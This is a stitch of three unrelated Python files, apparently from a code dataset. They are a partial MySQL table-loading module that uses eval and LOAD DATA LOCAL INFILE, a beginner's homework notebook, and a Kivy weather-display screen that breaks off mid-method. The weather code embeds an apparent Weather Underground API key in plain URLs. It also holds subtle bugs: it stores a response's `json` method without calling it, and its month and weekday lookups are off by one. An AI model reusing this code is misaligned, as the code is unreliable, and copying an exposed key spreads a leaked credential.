                                format(schema_name=self.prf_name,
                                       table_name=self.table_name,
                                       statement=statement))
        server_utils.mysql_engine.execute(statement)
        # statement = "creation_module.{table_name}.__table__.delete({engine_name})" \
        #     .format(table_name=self.table_name,
        #             engine_name="server_utils.mysql_engine")
        # exec(statement)
    @debug(lvl=logging.DEBUG, prefix='')
    def drop_and_create_if_not_exists(self):
        """Always end with a freshly created, empty table.

        NOTE(review): despite the name, an existing table is dropped and
        recreated rather than left alone -- confirm callers expect a reset.
        """
        if not self.exists():
            self.create_a()
        else:
            self.drop()
            self.create_a()
class ARWTable(ConsoleTable):
    """Console table backed by an ARW report CSV file on disk."""
    logger = CustomAdapter(logging.getLogger(str(__name__)), None)

    @debug(lvl=logging.NOTSET, prefix='ARW Table Initiated')
    def __init__(self,
                 session,
                 prf_name,
                 prf_col,
                 base_table_name,
                 table_name,
                 filepath=None,
                 ):
        super().__init__(
            session=session,
            prf_name=prf_name,
            prf_col=prf_col,
            base_table_name=base_table_name,
            table_name=table_name
        )
        self.filepath = filepath

    # region filepath #################################################################################################
    @property
    @debug(lvl=logging.NOTSET)
    def filepath(self):
        """Path of the CSV file backing this table."""
        return self._filepath

    @filepath.setter
    @debug(lvl=logging.NOTSET)
    def filepath(self, value):
        # Coerce to string first; anything that cannot be stringified is rejected.
        try:
            candidate = str(value)
        except ValueError:
            raise AttributeError("{0}: Value cannot be converted to string: {1}".format("filepath", value))
        fileroot = config.SOURCE_PATH / "cep_price_console" / "db_management"
        # TODO: Production Change -- in production the path should be rooted
        # under fileroot rather than taken verbatim.
        resolved = candidate
        # resolved = fileroot + candidate
        if not is_path_exists_or_creatable(resolved):
            raise AttributeError("{0}: Value is not a valid filepath: {1}".format("filepath", resolved))
        self._filepath = resolved
    # endregion ########################################################################################################
class StaticTable(ConsoleTable):
    """Console table populated from another ("master") table rather than an
    ARW CSV file; the populate statement is supplied externally via
    ``append_stmt``."""
    logger = CustomAdapter(logging.getLogger(str(__name__)), None)
    @debug(lvl=logging.NOTSET, prefix='Static table initiated')
    def __init__(self,
                 session,
                 prf_name,
                 prf_col,
                 base_table_name,
                 table_name,
                 master_table_name=None):
        # master_table_name: optional source table rows are copied from.
        super().__init__(
            session=session,
            prf_name=prf_name,
            prf_col=prf_col,
            base_table_name=base_table_name,
            table_name=table_name
        )
        self.master_table_name = master_table_name
        self._append_stmt = None
    # region append_stmt ##############################################################################################
    @property
    @debug(lvl=logging.NOTSET)
    def append_stmt(self):
        """Pre-built statement used to populate this table; set by callers."""
        return self._append_stmt
    @append_stmt.setter
    @debug(lvl=logging.DEBUG)
    def append_stmt(self, value):
        self._append_stmt = value
    # endregion ########################################################################################################
class CurrentTable(ARWTable):
    """ARW-backed table holding the most recent CSV snapshot; ``append()``
    bulk-loads the CSV into MySQL via LOAD DATA LOCAL INFILE."""
    logger = CustomAdapter(logging.getLogger(str(__name__)), None)

    @debug(lvl=logging.DEBUG)
    def append(self):
        """Bulk-load this table's CSV file into the MySQL table.

        Reads only the first CSV row to map file columns onto Field objects,
        builds the LOAD DATA column list (numeric/date columns are routed
        through @var placeholders so empty strings and ARW date formats can
        be converted in the SET clause), then executes the statement.

        Bug fix: the INFILE path in the SQL template was a literal string, so
        the ``filename=`` argument passed to ``str.format`` was never used
        and MySQL was pointed at a nonexistent file; the ``{filename}``
        placeholder is restored.
        """
        # Double-backslash escaping for the open() call below; the sentinel
        # swap protects pre-existing double backslashes.
        filepath_useful = self.filepath.replace('\\\\', '+-+-+-+-').replace('\\', '\\\\').replace('+-+-+-+-', '\\\\')
        order_mapping_dict = {}
        temp_field_key_list = list(self.fields.keys())
        # Inspect just the header-derived first row to learn the file's
        # column order, matching each header name to its Field object.
        with open(filepath_useful, newline='') as csvfile:
            spamreader = csv.DictReader(csvfile, delimiter=',', quotechar='"')
            for row in spamreader:
                for col_num, col_name in enumerate(row.keys()):
                    for field_key in sorted(temp_field_key_list, key=lambda x: int(x)):
                        field_obj = self.fields.get(field_key)
                        if field_obj.arw_name == col_name:
                            order_mapping_dict[col_num] = field_obj
                            temp_field_key_list.remove(field_key)
                            break
                break
        field_lst = []
        set_lst = []
        set_dict = {}
        var_cntr_int = 0
        for field_key in sorted(order_mapping_dict.keys(), key=lambda x: int(x)):
            field_obj = order_mapping_dict.get(field_key)
            if field_obj.logical_field == "N":
                if field_obj.data_type in (
                        "BigInteger", "Date", "DateTime", "Float", "Integer", "Numeric", "SmallInteger", "Time"):
                    # Load into a user variable; converted in the SET clause.
                    var_cntr_int += 1
                    var_str = "@var" + str(var_cntr_int)
                    set_dict[var_str] = field_obj
                    field_lst.append(" {0}".format(var_str))
                elif not field_obj.generated:
                    # field_lst.append(" {0}".format(field_obj.column_name))
                    field_lst.append(" `{0}`".format(field_obj.column_name))
            elif field_obj.logical_field == "Y":
                # Logical fields are not loaded from the file.
                if field_obj.column_name not in ("ID", "Date_Time_Stamp"):
                    pass
        # Build the SET clause conversions for the @var placeholders.
        for var_str, field_obj in set_dict.items():
            if field_obj.data_type in ("Date", "DateTime", "Time"):
                func_str = "STR_TO_DATE"
                format_str = ""
                aug_var_str = var_str
                if field_obj.data_type == "DateTime":
                    format_str = "%Y-%m-%d %H.%i.%s"
                elif field_obj.data_type == "Date":
                    format_str = "%m/%d/%Y"
                elif field_obj.data_type == "Time":
                    # ARW times lack the space before AM/PM; splice one in.
                    format_str = "%h:%i %p"
                    aug_var_str = "CONCAT(SUBSTRING({0},1,5),' ',SUBSTRING({0},6))".format(var_str)
                set_lst.append(" `{col_name}` = {func_str}({aug_var_str}, '{format_str}')".format(
                    col_name=field_obj.column_name,
                    func_str=func_str,
                    aug_var_str=aug_var_str,
                    format_str=format_str
                ))
            elif field_obj.data_type in ("BigInteger", "Float", "Integer", "Numeric", "SmallInteger"):
                # NULLIF converts empty CSV cells to SQL NULL for numerics.
                func_str = "NULLIF"
                aug_var_str = var_str
                set_lst.append(" `{col_name}` = {func_str}({aug_var_str}, '')".format(
                    col_name=field_obj.column_name,
                    func_str=func_str,
                    aug_var_str=aug_var_str,
                ))
        set_stmt = ""
        if len(set_dict) == 0:
            pass
        elif len(set_dict) > 0:
            set_stmt = "\n" + ',\n'.join(map(str, set_lst)) + ",\n    "
        file_creation_date = creation_date(self.filepath)
        # Re-escape for the SQL string (overwrites the open()-style escaping).
        filepath_useful = self.filepath.replace('\\', '\\\\')
        sql = text("""
            LOAD DATA LOCAL INFILE '{filename}'
            INTO TABLE `{schema_name}`.`{table_name}`
            FIELDS TERMINATED BY ',' OPTIONALLY ENCLOSED BY '\\"'
            LINES TERMINATED BY '\\r\\n'
            IGNORE 1 LINES (
            {field_lst}
            )
            SET{set_stmt} `Date_Time_Stamp` = '{file_creation_date}';""".format(
            filename=filepath_useful,
            schema_name=self.prf_name,
            table_name=self.table_name,
            field_lst=',\n'.join(map(str, field_lst)),
            set_stmt=set_stmt,
            file_creation_date=file_creation_date))
        self.session.execute(sql)
        self.session.commit()
class ArchiveTable(ARWTable):
    """Archive companion of a current table: ``append()`` copies rows from
    the matching ``<base>_01_current`` table and
    ``delete_sub_max_date_time()`` keeps only the newest snapshot per
    calendar day.

    The SQLAlchemy statements are assembled as strings and eval'd because
    the mapped classes in ARW_PRF_Mapping are looked up by dynamic table
    name at runtime.
    """
    logger = CustomAdapter(logging.getLogger(str(__name__)), None)
    @debug(lvl=logging.NOTSET, prefix='')
    def __init__(self,
                 session,
                 prf_name,
                 prf_col,
                 base_table_name,
                 table_name,
                 filepath=None,
                 ):
        super().__init__(
            session=session,
            prf_name=prf_name,
            prf_col=prf_col,
            base_table_name=base_table_name,
            table_name=table_name,
            filepath=filepath)
        self._append_stmt = None
    @debug(lvl=logging.DEBUG, prefix='')
    def append(self):
        """INSERT ... SELECT every non-generated column (except ID) from the
        current table into this archive table."""
        # noinspection PyUnusedLocal, PyUnresolvedReferences
        import cep_price_console.db_management.ARW_PRF_Mapping as ARW_PRF_Mapping
        query_stmt = "self.session.query(\n"
        insert_stmt = "ARW_PRF_Mapping.{table_name}.__table__.insert().from_select([\n".format(
            table_name=self.table_name
        )
        # Build matching select-column and insert-column lists in field order.
        for col_num, field_obj in sorted(self.fields.items(), key=lambda x: int(x[0])):
            if field_obj.column_name != 'ID':
                if not field_obj.generated:
                    query_stmt += " ARW_PRF_Mapping.{base_table_name}_01_current.{field_name},\n".format(
                        base_table_name=self.base_table_name,
                        field_name=field_obj.column_name
                    )
                    insert_stmt += " ARW_PRF_Mapping.{table_name}.__table__.c.{field_name},\n".format(
                        table_name=self.table_name,
                        field_name=field_obj.column_name
                    )
        query_stmt += ")"
        print(query_stmt)
        # noinspection PyUnusedLocal
        # query_obj is referenced by name inside the eval'd insert statement.
        query_obj = eval(query_stmt)
        insert_stmt += " ],\n query_obj\n)"
        # noinspection PyUnusedLocal
        insert_obj = eval(insert_stmt)
        server_utils.mysql_engine.execute(insert_obj)
    @debug(lvl=logging.DEBUG, prefix='')
    def max_date_time(self):
        """Return the newest Date_Time_Stamp in the archive, or None.

        NOTE(review): the bare try/finally returns even when eval raises,
        silently yielding None on any error -- confirm this best-effort
        behavior is intentional.
        """
        # noinspection PyUnusedLocal, PyUnresolvedReferences
        import cep_price_console.db_management.ARW_PRF_Mapping as ARW_PRF_Mapping
        statement = "self.session.query(func.max(ARW_PRF_Mapping.{table_name}.__table__.c.Date_Time_Stamp)).scalar()" \
            .format(table_name=self.table_name)
        evaluated_statement = None
        try:
            evaluated_statement = eval(statement)
        finally:
            return evaluated_statement
    @debug(lvl=logging.DEBUG, prefix='')
    def delete_sub_max_date_time(self):
        """Delete every row that is not the newest snapshot of its calendar
        day, keeping one Date_Time_Stamp per date."""
        # noinspection PyUnresolvedReferences, PyUnusedLocal
        import cep_price_console.db_management.ARW_PRF_Mapping as ARW_PRF_Mapping
        # Subquery: newest timestamp for each distinct date.
        max_date_time_per_date_statement = \
            "self.session.query(" \
            "func.max(ARW_PRF_Mapping.{table_name}.__table__.c.Date_Time_Stamp).label('DateTime')," \
            "func.DATE(ARW_PRF_Mapping.{table_name}.__table__.c.Date_Time_Stamp).label('Date'))." \
            "group_by(func.DATE(ARW_PRF_Mapping.{table_name}.__table__.c.Date_Time_Stamp)).subquery()".format(
                table_name=self.table_name)
        # noinspection PyUnusedLocal
        max_date_time_per_date = eval(max_date_time_per_date_statement)
        # IDs whose timestamp is NOT the daily maximum (anti-join).
        id_not_max_date_time_per_date_statement = \
            "self.session.query(ARW_PRF_Mapping.{table_name}.__table__.c.ID)." \
            "outerjoin(max_date_time_per_date, " \
            "ARW_PRF_Mapping.{table_name}.__table__.c.Date_Time_Stamp == max_date_time_per_date.c.DateTime)." \
            "filter(max_date_time_per_date.c.DateTime.is_(None))".format(
                table_name=self.table_name)
        id_not_max_date_time_per_date = eval(id_not_max_date_time_per_date_statement)
        # noinspection PyUnusedLocal
        # delete_list is referenced by name inside the eval'd delete statement.
        delete_list = [r[0] for r in id_not_max_date_time_per_date]
        delete_not_max_id_statement = \
            "ARW_PRF_Mapping.{table_name}.__table__.delete().where(" \
            "ARW_PRF_Mapping.{table_name}.__table__.c.ID.in_(delete_list))".format(
                table_name=self.table_name)
        delete_not_max_id = eval(delete_not_max_id_statement)
        server_utils.mysql_engine.execute(delete_not_max_id)
logger = CustomAdapter(logging.getLogger(str(__name__)), None)


@debug(lvl=logging.NOTSET, prefix='')
def reset_table(table_obj):
    """Leave the mapped table empty: either drop-and-recreate it (default)
    or, with the toggle flipped, TRUNCATE it in place."""
    # noinspection PyUnusedLocal
    drop_and_create = True
    tbl = table_obj.__table__
    if not drop_and_create:
        # Truncate path (disabled by the toggle above).
        statement = ("TRUNCATE `{schema_name}`.`{table_name}`;".format(schema_name=tbl.schema,
                                                                       table_name=tbl.name))
        logger.log(logging.NOTSET, "{schema_name}.{table_name} Truncate Statement: {statement}".
                   format(schema_name=tbl.schema,
                          table_name=tbl.name,
                          statement=statement))
        server_utils.mysql_engine.execute(statement)
        return
    table_present = server_utils.mysql_engine.dialect.has_table(server_utils.mysql_engine,
                                                                tbl.name,
                                                                schema=tbl.schema)
    if table_present:
        logger.log(logging.NOTSET, "Table exists: {schema_name}.{table_name}".format(
            schema_name=tbl.schema, table_name=tbl.name))
        tbl.drop(server_utils.mysql_engine)
    else:
        logger.log(logging.NOTSET, "Table does not exist: {schema_name}.{table_name}".format(
            schema_name=tbl.schema, table_name=tbl.name))
    # Either way the table is (re)created empty.
    tbl.create(server_utils.mysql_engine)
@debug(lvl=logging.DEBUG, prefix='')
def schema_exists(schema_name):
    """Return True if the MySQL schema exists, probing via SHOW CREATE SCHEMA."""
    probe = "SHOW CREATE SCHEMA `{0}`;".format(schema_name)
    try:
        server_utils.mysql_engine.execute(probe).scalar()
    except exc.DBAPIError:
        # The server rejects SHOW CREATE SCHEMA for unknown schemas.
        PrimaryReportFile.logger.log(logging.NOTSET, "Schema Does Not Exist: {0}".format(schema_name))
        return False
    PrimaryReportFile.logger.log(logging.NOTSET, "Schema Exists: {0}".format(schema_name))
    return True
@debug(lvl=logging.DEBUG, prefix='')
def schema_create(schema_name):
    """Create the MySQL schema unconditionally."""
    PrimaryReportFile.logger.log(logging.NOTSET, "Creating Schema: {0}".format(schema_name))
    ddl = CreateSchema(schema_name)
    server_utils.mysql_engine.execute(ddl)
@debug(lvl=logging.DEBUG, prefix='')
def schema_create_if_not_exists(schema_name):
    """Create the schema only when it is missing."""
    if schema_exists(schema_name):
        return
    schema_create(schema_name)
|
13,145 | c9dfa563cb1c5a00c77946ac4bc209805de42021 | # -*- coding: utf-8 -*-
"""Day 5 Python B7.ipynb
Automatically generated by Colaboratory.
Original file is located at
https://colab.research.google.com/drive/183SIqL4bd1jBHBBW0Y54EB_geafSrBbW
# Assignment 1 Day 5
"""
# Assignment 1: read a list from the user and check whether `lst` appears in
# it as an ordered subsequence (membership checked with a set, order checked
# with a sequential scan).
Listy = []
n = int(input("Enter no. of elements in the list: "))
for i in range(0, n):
    element = int(input())
    Listy.append(element)
print("\nThe entered list is: " + str(list(Listy)))
lst = [1, 1, 5]
print("The sub list is: " + str(list(lst)))
flag = set(lst).issubset(set(Listy))
j = 0
for num in range(0, n):
    # Guard j so comparison stops once every element of lst is matched; the
    # original indexed lst[j] unconditionally and raised IndexError when a
    # further match candidate appeared after the last element was matched.
    if j < len(lst) and Listy[num] == lst[j]:
        j = j + 1
# len(lst) instead of the hardcoded 3, so changing lst keeps this correct.
if flag and j == len(lst):
    print("\nIt's a Match !!")
else:
    print("\nIt's a Gone !!")
"""# Assignment 2 Day 5"""
def prime(n):
    """Return True when n is a prime number, False otherwise.

    Bug fix: the original attached ``else: return True`` to the ``if`` inside
    the loop, so it returned True as soon as the *first* trial divisor (2)
    did not divide n -- every odd composite (9, 15, 21, ...) was reported
    prime -- and 0, 1 and 2 fell through returning None.  Trial division now
    runs up to sqrt(n) and small n are handled explicitly.
    """
    if n < 2:
        return False
    for i in range(2, int(n ** 0.5) + 1):
        if n % i == 0:
            return False
    return True
# Print every prime in [1, 2500) according to the prime() predicate above.
l = list(range(1, 2500))
print([candidate for candidate in l if prime(candidate)])
"""# Assignment 3 Day 5"""
# Assignment 3: upper-case every sentence in the list using map().
lst = ["hey this is bhavana", "i am in mumbai"]
getCapital = lambda sent: sent.upper()
newList = map(getCapital, lst)
print(list(newList))
13,146 | a697fb59a51cd243205429e4f97edfa6d397e1a3 | from kivy.clock import Clock
from kivy.uix.label import Label
from kivy.uix.widget import Widget
from kivy.uix.screenmanager import ScreenManager, Screen
from kivy.graphics import Canvas, Line, Rectangle, Ellipse, Color, Triangle
from kivy.core.window import Window
from functions.function import grid_function
import requests
import datetime
class WeatherScreen(Screen):
    """Kivy screen showing current weather, a 4-day forecast and sun/moon
    astronomy data pulled from the Weather Underground API.

    NOTE(review): all widgets and flags below are *class* attributes, so
    every WeatherScreen instance shares the same Label objects -- confirm
    only one instance is ever created.
    """
    new_screen = True
    call_draw = True
    logged_data = False  # True once API data has been fetched successfully
    error = False  # True when the API fetch failed with a connection error
    for_data = ''  # forecast API payload (dict once fetched)
    current_data = ''  # current-conditions API payload
    astro_data = ''  # astronomy API payload
    current_time = ''  # "H:M" string reported by the astronomy feed
    rows = 6  # layout grid dimensions passed to grid_function
    cols = 6
    lb_time = Label(text='text')
    a = Label(text='Weather')  # title
    b = Label(text='text: ', font_size='64sp')  # current temp
    c = Label(text='text')  # Daily high and low
    d = Label(text='text')  # Daily conditions with built in word wrap
    d1 = Label(text='text')  # overflow lines 2-4 of the conditions text
    d2 = Label(text='text')
    d3 = Label(text='text')
    e = Label(text='text')  # Daily pop and other info
    e1 = Label(text='text')  # average wind speed
    e2 = Label(text='text')  # average humidity
    f = Label(text='text')  # Sun up
    g = Label(text='text')  # Sun Down
    h = Label(text='text')  # Moon up
    i = Label(text='text')  # Moon Down
    j = Label(text='Solar: ')
    k = Label(text='Lunar: ')
    l = Label(text='text')  # Length of Day
    m = Label(text='text')  # Phase of Moon
    n = Label(text='text', font_size='24sp')  # Date
    o = Label(text='text', font_size='48sp')  # Time
    date_rect = ''
    time_rect = ''
    i0 = ''  # URL of the current-conditions weather icon
    i1 = ''
    lb_day0 = Label(text='text')  # Day of the week for forecast
    lb_day1 = Label(text='text', font_size='24sp')
    lb_day2 = Label(text='text', font_size='24sp')
    lb_day3 = Label(text='text', font_size='24sp')
    lb_high0 = Label(text='text')  # Daily Highs
    lb_high1 = Label(text='text')
    lb_high2 = Label(text='text')
    lb_high3 = Label(text='text')
    lb_low0 = Label(text='text')  # Daily Lows
    lb_low1 = Label(text='text')
    lb_low2 = Label(text='text')
    lb_low3 = Label(text='text')
    lb_pop0 = Label(text='text')  # Daily Percent Chance of Precipitation
    lb_pop1 = Label(text='text')
    lb_pop2 = Label(text='text')
    lb_pop3 = Label(text='text')
    # Index-aligned groups get_data() iterates to fill the forecast columns.
    day_list = [lb_day0, lb_day1, lb_day2, lb_day3]
    high_list = [lb_high0, lb_high1, lb_high2, lb_high3]
    low_list = [lb_low0, lb_low1, lb_low2, lb_low3]
    pop_list = [lb_pop0, lb_pop1, lb_pop2, lb_pop3]
def __init__(self, **kwargs): # commented out the clock
super(Screen, self).__init__(**kwargs)
self.setup()
    def setup(self):
        """Draw the static background image, frame lines and the sun/moon
        timeline graphics onto the screen's before-canvas."""
        x, y, col_sp, row_sp, x_list, y_list = grid_function(self.cols, self.rows)
        with self.canvas.before:
            Rectangle(pos=(0, 0), source='images/BG_1.png', size=(x, y))
            # Black outer frame plus the horizontal and vertical dividers.
            Color(0,0,0)
            Line(points=(col_sp/50, y_list[0], x - col_sp/50, y_list[0], x - col_sp/50, y_list[5] + row_sp/2, col_sp/50, y_list[5] + row_sp/2, col_sp/50, y_list[0], x - col_sp/50), width=1)
            Line(points=(col_sp/50, y_list[2] - row_sp/2, x - col_sp/50, y_list[2] - row_sp/2))
            Line(points=(3*col_sp, y_list[2] - row_sp/2, 3*col_sp, 0))
            # Red sun timeline with endpoint dots.
            Color(.9, .2, .2)
            Line(points=(x_list[1], y_list[3] + row_sp/4, x_list[3], y_list[3] + row_sp/4), width=1.5)
            Ellipse(pos=(x_list[1] - 5, y_list[3] + row_sp/4 - 5), size=(10, 10))
            Ellipse(pos=(x_list[3] - 5, y_list[3] + row_sp/4 - 5), size=(10, 10))
            # Blue moon timeline with endpoint dots.
            Color(.2, .2, .9)
            Line(points=(x_list[1], y_list[3] - row_sp/2, x_list[3], y_list[3] - row_sp/2), width=1.5)
            Ellipse(pos=(x_list[1] - 5, y_list[3] - row_sp/2 - 5), size=(10, 10))
            Ellipse(pos=(x_list[3] - 5, y_list[3] - row_sp/2 - 5), size=(10, 10))
            # Reset the draw colour to white for subsequent instructions.
            Color(1, 1, 1)
def get_data(self):
print('getting data')
while True:
try:
# get and save weather data
# data includes current, forecast, and astronomy
c = requests.get("http://api.wunderground.com/api/1a6103aff95a0f09/conditions/q/TX/Austin.json")
f = requests.get("http://api.wunderground.com/api/1a6103aff95a0f09/forecast/q/TX/Austin.json")
a = requests.get("http://api.wunderground.com/api/1a6103aff95a0f09/astronomy/q/TX/Austin.json")
self.current_data = c.json
self.for_data = f.json
self.astro_data = a.json
self.logged_data = True
# ################################################################################################################### #
# Current Data Labels
# Current Temp
self.b.text = str(self.current_data['current_observation']['temp_f']) + 'F'
self.i0 = self.current_data['current_observation']['icon_url']
with open('images/w_icon.png', 'wb') as f:
f.write(requests.get(self.i0).content)
# Current conditions description, if statements handel word wrap
d_text = 'Conditions: ' + str(self.for_data['forecast']['txt_forecast']['forecastday'][0]['fcttext'])
if len(d_text) > 180:
self.d.text = d_text[0:60]
self.d1.text = d_text[60:120]
self.d2.text = d_text[120:180]
self.d3.text = d_text[180:]
elif len(d_text) > 120:
self.d.text = d_text[0:60]
self.d1.text = d_text[60:120]
self.d2.text = d_text[120:]
elif len(d_text) > 60:
self.d.text = d_text[0:60]
self.d1.text = d_text[60:]
else:
self.d.text = d_text
# #################################################################################################################### #
# Forecast Data Labels
i = 0
for day in self.for_data['forecast']['simpleforecast']['forecastday']:
self.day_list[i].text = day['date']['weekday']
if i == 0:
self.high_list[i].text = day['high']['fahrenheit']
self.low_list[i].text = day['low']['fahrenheit']
self.pop_list[i].text = str(day['pop'])
else:
self.high_list[i].text = 'High: ' + str(day['high']['fahrenheit']) + 'F'
self.low_list[i].text = 'Low: ' + str(day['low']['fahrenheit']) + 'F'
self.pop_list[i].text = 'POP: ' + str(day['pop']) + '%'
i += 1
self.c.text = self.high_list[0].text + 'F / ' + self.low_list[0].text + 'F'
self.e.text = 'Chance of Precipitation: ' + self.pop_list[0].text + '%'
self.e1.text = 'Avg Wind Speed: ' + str(self.for_data['forecast']['simpleforecast']['forecastday'][0]['avewind']['mph']) + 'mph'
self.e2.text = 'Avg Humidity: ' + str(self.for_data['forecast']['simpleforecast']['forecastday'][0]['avehumidity'])
# #################################################################################################################### #
# Astronomy Labels
self.f.text = 'Rise: ' + str(self.astro_data['sun_phase']['sunrise']['hour']) + ':' + \
str(self.astro_data['sun_phase']['sunrise']['minute'])
self.g.text = 'Set: ' + str(self.astro_data['sun_phase']['sunset']['hour']) + ':' + \
str(self.astro_data['sun_phase']['sunset']['minute'])
self.h.text = 'Rise: ' + str(self.astro_data['moon_phase']['moonrise']['hour']) + ':' + \
str(self.astro_data['moon_phase']['moonrise']['minute'])
self.i.text = 'Set: ' + str(self.astro_data['moon_phase']['moonset']['hour']) + ':' + \
str(self.astro_data['moon_phase']['moonset']['minute'])
self.current_time = str(self.astro_data['moon_phase']['current_time']['hour']) + ':' + \
str(self.astro_data['moon_phase']['current_time']['minute'])
sun_range = abs(int(self.astro_data['sun_phase']['sunset']['hour']) +
int(self.astro_data['sun_phase']['sunset']['minute']) / 60 -
int(self.astro_data['sun_phase']['sunrise']['hour']) -
int(self.astro_data['sun_phase']['sunrise']['minute']) / 60)
self.l.text = 'Length of Day: ' + str(round(sun_range, 2)) + 'hrs'
self.m.text = 'Phase of Moon: ' + str(self.astro_data['moon_phase']['phaseofMoon'])
break
except ConnectionError:
self.error = True
break
def get_time_date(self):
now = datetime.datetime.now()
weekdays = ['Sunday', 'Monday', 'Tuesday', 'Wednesday', 'Thursday', 'Friday', 'Saturday']
months = ['January', 'February', 'March', 'April', 'May', 'June', 'July', 'August', 'September', 'October', 'November', 'December']
day = weekdays[now.weekday()]
month = months[now.month]
self.n.text = (day + ', ' + month + ' ' + str(now.day))
minute = now.minute
if minute < 10:
minute = '0' + str(minute)
else:
minute = str(minute)
sec = now.second
if sec < 10:
sec = '0' + str(sec)
else:
sec = str(sec)
micro = str(now.microsecond)
micro = micro[:2]
self.o.text = ('%d' % now.hour + ':' + minute + ':' + sec + ':' + micro)
    def static_draw(self, new_input, input_list):
        # Rebuild the whole weather screen on the canvas: current conditions,
        # alert lines, astronomy rows with sun/moon progress markers, and the
        # multi-day forecast strip.  Everything is drawn once per screen entry;
        # only the date/time rectangles (kept as attributes at the bottom) are
        # refreshed each frame by dynamic_draw().
        x, y, col_sp, row_sp, x_list, y_list = grid_function(self.cols, self.rows)
        '''self.add_widget(Label(text=self.high_list[0].text,
        pos=(-x/2, -y/2 + y_list[5] - row_sp/4),
        font_size='64sp')) # current temp
        self.add_widget(Label(text=self.high_list[0].text + ' / ' + self.low_list[0].text,
        pos=(-x/2 + self.size[0]/2, -y/2 + y_list[4] + row_sp/3),
        font_size='16sp')) # current temp'''
        self.canvas.clear()
        with self.canvas:
            # Current-conditions column (top-left): location (a), temperature (b),
            # conditions text (c), and the weather icon image.
            Rectangle(pos=(col_sp/32, y - row_sp/3), texture=self.a.texture, size=self.a.texture.size)
            Rectangle(pos=(col_sp/32, y_list[4] + 2*row_sp/3), texture=self.b.texture, size=self.b.texture.size)
            Rectangle(pos=(col_sp/32 + self.b.texture.size[0]/2 - self.c.texture.size[0]/2, y_list[4] + row_sp/2),
                      texture=self.c.texture,
                      size=self.c.texture.size)
            Rectangle(pos=(x_list[1] + col_sp/2, y_list[4] + 7*row_sp/12), source='images/w_icon.png', size=(75,75))
            # Alert block (d..d3): stack as many alert lines as were populated.
            # 'text' is the untouched Label default, i.e. that slot holds no alert.
            if self.d3.text != 'text':
                Rectangle(pos=(x_list[2] + col_sp/2, y_list[5]), texture=self.d.texture, size=self.d.texture.size)
                Rectangle(pos=(x_list[2] + col_sp/2, y_list[5] - self.d.texture.size[1]),
                          texture=self.d1.texture,
                          size=self.d1.texture.size)
                Rectangle(pos=(x_list[2] + col_sp/2, y_list[5] - self.d1.texture.size[1]*2),
                          texture=self.d2.texture,
                          size=self.d2.texture.size)
                Rectangle(pos=(x_list[2] + col_sp/2, y_list[5] - self.d2.texture.size[1]*3),
                          texture=self.d3.texture,
                          size=self.d3.texture.size)
            elif self.d2.text != 'text':
                Rectangle(pos=(x_list[2] + col_sp/2, y_list[5]), texture=self.d.texture, size=self.d.texture.size)
                Rectangle(pos=(x_list[2] + col_sp/2, y_list[5] - self.d.texture.size[1]),
                          texture=self.d1.texture,
                          size=self.d1.texture.size)
                Rectangle(pos=(x_list[2] + col_sp/2, y_list[5] - self.d1.texture.size[1]*2),
                          texture=self.d2.texture,
                          size=self.d2.texture.size)
            elif self.d1.text != 'text':
                Rectangle(pos=(x_list[2] + col_sp/2, y_list[5]), texture=self.d.texture, size=self.d.texture.size)
                Rectangle(pos=(x_list[2] + col_sp/2, y_list[5] - self.d.texture.size[1]),
                          texture=self.d1.texture,
                          size=self.d1.texture.size)
            else:
                Rectangle(pos=(x_list[2] + col_sp/2, y_list[5]), texture=self.d.texture, size=self.d.texture.size)
            # Precipitation, Wind, and Humity
            Rectangle(pos=(col_sp/32, y_list[4]), texture=self.e.texture, size=self.e.texture.size)
            Rectangle(pos=(col_sp/32, y_list[4] - self.e.texture.size[1]), texture=self.e1.texture, size=self.e1.texture.size)
            Rectangle(pos=(col_sp/32, y_list[4] - self.e.texture.size[1]*2), texture=self.e2.texture, size=self.e2.texture.size)
            # ASTRONOMY TITLES, Solar Title(j) nad Lunar Title(k)
            Rectangle(pos=(col_sp/32, y_list[3] + row_sp/4 - 10), texture=self.j.texture, size=self.j.texture.size)
            Rectangle(pos=(col_sp/32, y_list[3] - row_sp/2 - 10), texture=self.k.texture, size=self.k.texture.size)
            # End segments of solar line (x_list[1], y_list[3] + row_sp/4) and (x_list[3], y_list[3] + row_sp/4)
            # End segments of lunar line (x_list[1], y_list[3] - row_sp/2) and (x_list[3], y_list[3] - row_sp/2)
            # Sun up(f) Sun down(g) Moon up(h) Moon down(i)
            Rectangle(pos=(x_list[1] - self.f.texture.size[0]/2, y_list[3]), texture=self.f.texture, size=self.f.texture.size)
            Rectangle(pos=(x_list[3] - self.g.texture.size[0]/2, y_list[3]), texture=self.g.texture, size=self.g.texture.size)
            Rectangle(pos=(x_list[1] - self.h.texture.size[0]/2, y_list[3] - .75*row_sp), texture=self.h.texture, size=self.h.texture.size)
            Rectangle(pos=(x_list[3] - self.i.texture.size[0]/2, y_list[3] - .75*row_sp), texture=self.i.texture, size=self.i.texture.size)
            # Show current sun and moon location
            # Hours above/below the horizon, in fractional hours.  NOTE(review):
            # this assumes rise and set happen on the same day — confirm for
            # high-latitude or overnight moonrise cases.
            sun_range = abs(int(self.astro_data['sun_phase']['sunset']['hour']) +
                            int(self.astro_data['sun_phase']['sunset']['minute']) / 60 -
                            int(self.astro_data['sun_phase']['sunrise']['hour']) -
                            int(self.astro_data['sun_phase']['sunrise']['minute']) / 60)
            moon_range = abs(int(self.astro_data['moon_phase']['moonset']['hour']) +
                             int(self.astro_data['moon_phase']['moonset']['minute']) / 60 -
                             int(self.astro_data['moon_phase']['moonrise']['hour']) -
                             int(self.astro_data['moon_phase']['moonrise']['minute']) / 60)
            # Time elapsed since rise, used to place the progress tick on each line.
            s_calc_time = abs(int(self.astro_data['moon_phase']['current_time']['hour']) +
                              int(self.astro_data['moon_phase']['current_time']['minute']) / 60 -
                              int(self.astro_data['sun_phase']['sunrise']['hour']) -
                              int(self.astro_data['sun_phase']['sunrise']['minute']) / 60)
            m_calc_time = abs(int(self.astro_data['moon_phase']['current_time']['hour']) +
                              int(self.astro_data['moon_phase']['current_time']['minute']) / 60 -
                              int(self.astro_data['moon_phase']['moonrise']['hour']) -
                              int(self.astro_data['moon_phase']['moonrise']['minute']) / 60)
            sun_pct = s_calc_time / sun_range
            moon_pct = m_calc_time / moon_range
            # Draw the red (sun) / blue (moon) tick only while still above the horizon.
            if sun_pct < 1:
                Color(.9, .2, .2)
                Line(points=(3*col_sp*sun_pct, y_list[3] + row_sp/4 + row_sp/8, 3*col_sp*sun_pct, y_list[3] + row_sp/4 - row_sp/8), width=1.5)
            if moon_pct < 1:
                Color(.2, .2, .9)
